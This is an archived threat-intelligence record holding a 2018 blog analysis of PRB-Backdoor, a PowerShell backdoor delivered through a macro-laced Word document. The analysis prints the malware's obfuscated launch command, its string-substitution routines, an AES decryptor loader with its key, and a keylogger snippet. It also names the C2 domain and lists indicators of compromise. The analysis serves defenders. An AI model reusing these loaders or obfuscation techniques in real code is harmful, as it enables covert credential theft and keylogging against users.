{ "id": "76e9bcaf-d0cb-4b80-a842-9d8f0ffa6613", "created_at": "2026-04-06T00:10:51.517843Z", "updated_at": "2026-04-10T03:34:22.588472Z", "deleted_at": null, "sha1_hash": "fb5bbd3ab91b485ceb51965bcf02d5e066b28ccc", "title": "PRB-Backdoor - A Fully Loaded PowerShell Backdoor with Evil Intentions", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 230878, "plain_text": "PRB-Backdoor - A Fully Loaded PowerShell Backdoor with Evil\r\nIntentions\r\nBy Mo Bustami\r\nPublished: 2018-05-12 · Archived: 2026-04-05 14:39:10 UTC\r\nINTRODUCTION\r\nThe great people at ClearSky reached out to me a couple of days ago regarding a sample that they suspected could be related\r\nto MuddyWater. \r\nThey suspected so because the sample had some similarities with the way MuddyWater lures look like and some\r\nsimilarities in some PowerShell obfuscation, in specific the character substitution routine.\r\nMuddyWater Sample\r\nNew Sample\r\nHowever, after analyzing the sample and investigating it more, I was able to showcase that this is indeed something different\r\nbut nonetheless interesting. This blog is a walk through my analysis and will highlight initial insights into this potential\r\nattack.\r\nTHE SAMPLE - FROM AIRMILES TO MACRO CODE TO POWERSHELL\r\nThe sample that was shared with me is a macro laced word document called \"Egyptairplus.doc\" with an MD5 hash\r\nof fdb4b4520034be269a65cfaee555c52e. The macro code contains a function called Worker() which calls multiple other\r\nfunctions embedded in the document to ultimately run a PowerShell command:\r\n\"powershElL -EXEC bypASS -COmMaND \"\u0026 {$pth='\\Document1';$rt='';$Dt=geT-cOntEnt -patH $PTH -eNcoDInG\r\naSCIi;FOrEach($I in $DT){iF ($I.Length -Gt 7700){$rt='';$Dt=geT-cOntEnt -patH $PTH -eNcoDInG aSCIi;FOrEach($I\r\nin $DT){iF ($I.Length -Gt 7700){$rt=$i.sPLIt('**')[2];BREak}};$rt=\r\n[syStEm.TExT.eNCODing]::asCII.gEtsTrIng([sysTEm.ConverT]::FROmbaSe64sTriNG($rT));IEX($RT);\r\nThis command looks for a chunk of data that is embedded in the actual document and begins with \"**\" and then takes that\r\ncode and Base64 decodes it. The result is a PowerShell script that looks like this\r\nfunction main\r\n{\r\nhttps://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html\r\nPage 1 of 6\n\n$content=\"ZnVuY3Rpb24gejB3MnVQZVgoJHNLUHYpewogICAgJHNLUHYgPSAkc0tQdi5Ub0NoYXJBcnJheSgpCiAgICBbYXJyYXldOjpSZXZlcnNlKCR\r\n...\r\n...\r\n...\r\n... Truncated code...\r\n2ZhbHNlIiwgMCkp\"\r\n    [string]$decode = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($content))\r\n    iex $decode\r\n}\r\nmain\r\nReplacing iex with Write-Output and running this code will result in a second layer PowerShell script that is shown earlier in\r\nthe blog and has similarities with MuddyWater code due to the use of the Character Substitution functions. Below is a\r\nsnippet of the code:\r\nfunction z0w2uPeX($sKPv){\r\n    $sKPv = $sKPv.ToCharArray()\r\n    [array]::Reverse($sKPv)\r\n    $G8JdH = -join($sKPv)\r\n    return $G8JdH\r\n    }\r\nfunction FQdZ7EqW($fpuD){\r\n    $fpuD = $fpuD.Replace('#a#', \"`n\").Replace('#b#', '\"').Replace('#c#', \"'\").Replace('#d#', \"$\").Replace('#e#', \"``\")\r\n    return $fpuD\r\n    }\r\niex(FQdZ7EqW(\"{4}{5}{6}{1}{2}{0}{3}\" -f (z0w2uPeX(\"1 sd\")),\"Se\",\"con\",\"0\",\"S\",\"tart-Slee\",(z0w2uPeX(\"- p\")), 0))\r\niex(FQdZ7EqW(\"{2}{1}{5}{0}{4}{3}\" -f (z0w2uPeX(\" yeWs60\")),(z0w2uPeX(\"ob\")),\"[\",\"e\",(z0w2uPeX(\"urT#d#\r\n=\")),\"ol]#d#gS\", 0))\r\nOnce you replace all the iex with Write-Output you will end up with more readable code as shown below\r\nThis code still contains encoded chunks of data. Two interesting pieces are Invoker.ps1 and js.hta\r\nThe Invoker.ps1 script is used to decrypt the main Backdoor code as shown below:\r\n$nxUHOcAE = \"0ef4b1acb4394766\" #This is the Key used to Decrypt the main Backdoor code\r\n$xWCWwEep = \"{path}\"\r\n[string]$BJgVSQMa = Get-Content -Path $xWCWwEep -Force\r\n$nl3hMTam = new-object system.security.cryptography.RijndaelManaged\r\nhttps://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html\r\nPage 2 of 6\n\n$nl3hMTam.Mode = [System.Security.Cryptography.CipherMode]::ECB\r\n$nl3hMTam.Padding = [System.Security.Cryptography.PaddingMode]::Zeros\r\n$nl3hMTam.BlockSize = 128\r\n$nl3hMTam.KeySize = 128\r\n$nl3hMTam.Key = [System.Text.Encoding]::UTF8.GetBytes($nxUHOcAE)\r\n$W9NYYLlk = [System.Convert]::FromBase64String($BJgVSQMa)\r\n$Oj5PebcQ = $nl3hMTam.CreateDecryptor();\r\n$mL9fRirD = $Oj5PebcQ.TransformFinalBlock($W9NYYLlk, 0, $W9NYYLlk.Length);\r\n[string]$Pru8pJC5 = [System.Text.Encoding]::UTF8.GetString($mL9fRirD).Trim('*')\r\nWrite-Output $Pru8pJC5 #I replaced iex with Write-Output\r\nwhile($true){\r\nstart-sleep -seconds 3\r\n}\r\nWhen the encrypted Backdoor code is passed through this script it will be decrypted into the full fledged Backdoor code. I\r\nam sharing a snippet of the code here as the full code of the backdoor is over 2000 lines of code when properly formatted.\r\nNotice the main function name PRB hence the name I have given it \"PRB-Backdoor\"\r\nPOTENTIAL COMMAND \u0026 CONTROL\r\nRunning the sample in a sandbox did not show any network communication. However, during the analysis of the code I\r\nnoticed early on a variable with the value $hash.httpAddress =\"http://outl00k[.]net\" This looks like the main domain that the\r\nbackdoor communicates with for all of it's different functions.\r\nDoing some Passive DNS and WHOIS lookup we can get additional information on the domain:\r\nDomain Name: outl00k.net\r\nRegistrar WHOIS Server: whois.joker.com\r\nRegistrar URL: http://joker.com/\r\nUpdated Date: 2018-04-25T03:32:22Z\r\nCreation Date: 2018-01-01T11:35:58Z\r\nRegistrant Name: Simon Nitoo\r\nRegistrant Street: Tehran\r\nRegistrant City: Tehran\r\nRegistrant State/Province: Tehran\r\nRegistrant Postal Code: 231423465\r\nRegistrant Country: IR\r\nhttps://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html\r\nPage 3 of 6\n\nRegistrant Phone: +98.2189763584\r\nRegistrant Email: simon.nitoo@chmail.ir\r\nRegistry Admin ID:  \r\nAdmin Name: Simon Nitoo\r\nAdmin Street: Tehran\r\nAdmin City: Tehran\r\nAdmin State/Province: Tehran\r\nAdmin Postal Code: 231423465\r\nAdmin Country: IR\r\nAdmin Phone: +98.2189763584\r\nAdmin Email: simon.nitoo@chmail.ir\r\nRegistry Tech ID:  \r\nTech Name: Simon Nitoo\r\nTech Street: Tehran\r\nTech City: Tehran\r\nTech State/Province: Tehran\r\nTech Postal Code: 231423465\r\nTech Country: IR\r\nTech Phone: +98.2189763584\r\nTech Email: simon.nitoo@chmail.ir\r\nName Server: ns1.outl00k.net\r\nName Server: ns2.outl00k.net\r\nThe Registrant email address is also used for another domain LinLedin[.]net\r\nBoth domains are currently resolving to the following IP addresses\r\noutl00k[.]net - 74.91.19[.]118 up until May 10, 2018\r\nLinLedin[.]net - 5.160.124[.]99 on April 30, 2018\r\nAs of the writing of this blog, there doesn't seem to be much information about either of those domains. \r\nPRB-BACKDOOR FUNCTIONALITY - AN EARLY LOOK\r\nI am yet to go through the whole code of the backdoor however below is an initial look into the functionality of it based on\r\ninitial analysis.\r\nPRB Backdoor has the following functions:\r\nPRB-CREATEALIVE and PRB-CREATEINTRODUCE - those two functions seem to be related to\r\ninitial communication and registration with the C\u0026C\r\nPRB-HISTORY is a function that looks to grab the browsing history from different browsers including Chrome, IE\r\nand FireFox. It utilizes a sub function called GET-HISTORY\r\nhttps://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html\r\nPage 4 of 6\n\nPRB-PASSWORD\r\nPRB-WRITEFILE\r\nPRB-READFILE\r\nPRB-FUNCTUPDATE\r\nPRB-SHELL\r\nPRB-LOGGER\r\nSNAP - takes a screenshot of the screen\r\nsysinfo - gets the system info\r\nAnd many more functions.\r\nAt some point in the code there is even what seems to be .NET/C# code snippets\r\n  $dsc = @\"\r\nusing System;\r\nusing System.IO;\r\nusing System.Diagnostics;\r\nusing System.Runtime.InteropServices;\r\nusing System.Windows.Forms;\r\nusing System.Text;\r\nnamespace dDumper\r\n{\r\n    public static class Program\r\n    {\r\n        private const int WH_KEYBOARD_LL = 13;\r\n        private const int WM_KEYDOWN = 0x0100;\r\n        private const int WM_SYSTEMKEYDOWN = 0x0104;\r\n        private const int WM_KEYUP = 0x0101;\r\n        private const int WM_SYSTEMKEYUP = 0x0105;\r\nFINAL THOUGHTS\r\nThe PRB-Backdoor seems to be a very interesting piece of malware that is aimed to run on the victim machine and gather\r\ninformation, steal passwords, log keystrokes and perform many other functions. I could not find any reference to the\r\nbackdoor or its code in any public source.\r\nI would imagine there would be other lures and samples out there and hopefully other researchers that would be able to dive\r\ndeeper into the code and reveal additional details. I will do so as soon as I have additional time but I thought it would be\r\nbeneficial to share these initial findings in hope to shed some light into this activity.\r\nINDICATORS OF COMPROMISE\r\nfdb4b4520034be269a65cfaee555c52e\r\noutl00k[.]net\r\nLinLedin[.]net\r\n74.91.19[.]118\r\n5.160.124[.]99\r\nhttps://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html\r\nPage 5 of 6\n\nSource: https://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html\r\nhttps://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html" ], "report_names": [ "prb-backdoor-fully-loaded-powershell.html" ], "threat_actors": [ { "id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b", "created_at": "2022-10-25T15:50:23.308924Z", "updated_at": "2026-04-10T02:00:05.298591Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "MuddyWater", "Earth Vetala", "Static Kitten", "Seedworm", "TEMP.Zagros", "Mango Sandstorm", "TA450" ], "source_name": "MITRE:MuddyWater", "tools": [ "STARWHALE", "POWERSTATS", "Out1", "PowerSploit", "Small Sieve", "Mori", "Mimikatz", "LaZagne", "PowGoop", "CrackMapExec", "ConnectWise", "SHARPSTATS", "RemoteUtilities", "Koadic" ], "source_id": "MITRE", "reports": null }, { "id": "2ed8d590-defa-4873-b2de-b75c9b30931e", "created_at": "2023-01-06T13:46:38.730137Z", "updated_at": "2026-04-10T02:00:03.08136Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "TEMP.Zagros", "Seedworm", "COBALT ULSTER", "G0069", "ATK51", "Mango Sandstorm", "TA450", "Static Kitten", "Boggy Serpens", "Earth Vetala" ], "source_name": "MISPGALAXY:MuddyWater", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "156b3bc5-14b7-48e1-b19d-23aa17492621", "created_at": "2025-08-07T02:03:24.793494Z", "updated_at": "2026-04-10T02:00:03.634641Z", "deleted_at": null, "main_name": "COBALT ULSTER", "aliases": [ "Boggy Serpens ", "ENT-11 ", "Earth Vetala ", "ITG17 ", "MERCURY ", "Mango Sandstorm ", "MuddyWater ", "STAC 1171 ", "Seedworm ", "Static Kitten ", "TA450 ", "TEMP.Zagros ", "UNC3313 ", "Yellow Nix " ], "source_name": "Secureworks:COBALT ULSTER", "tools": [ "CrackMapExec", "Empire", "FORELORD", "Koadic", "LaZagne", "Metasploit", "Mimikatz", "Plink", "PowerStats" ], "source_id": "Secureworks", "reports": null }, { "id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb", "created_at": "2022-10-25T16:07:23.880522Z", "updated_at": "2026-04-10T02:00:04.775749Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "ATK 51", "Boggy Serpens", "Cobalt Ulster", "G0069", "ITG17", "Mango Sandstorm", "MuddyWater", "Operation BlackWater", "Operation Earth Vetala", "Operation Quicksand", "Seedworm", "Static Kitten", "T-APT-14", "TA450", "TEMP.Zagros", "Yellow Nix" ], "source_name": "ETDA:MuddyWater", "tools": [ "Agentemis", "BugSleep", "CLOUDSTATS", "ChromeCookiesView", "Cobalt Strike", "CobaltStrike", "CrackMapExec", "DCHSpy", "DELPHSTATS", "EmPyre", "EmpireProject", "FruityC2", "Koadic", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "MZCookiesView", "Meterpreter", "Mimikatz", "MuddyC2Go", "MuddyRot", "Mudwater", "POWERSTATS", "PRB-Backdoor", "PhonyC2", "PowGoop", "PowerShell Empire", "PowerSploit", "Powermud", "QUADAGENT", "SHARPSTATS", "SSF", "Secure Socket Funneling", "Shootback", "Smbmap", "Valyria", "chrome-passwords", "cobeacon", "prb_backdoor" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434251, "ts_updated_at": 1775792062, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/fb5bbd3ab91b485ceb51965bcf02d5e066b28ccc.pdf", "text": "https://archive.orkl.eu/fb5bbd3ab91b485ceb51965bcf02d5e066b28ccc.txt", "img": "https://archive.orkl.eu/fb5bbd3ab91b485ceb51965bcf02d5e066b28ccc.jpg" } }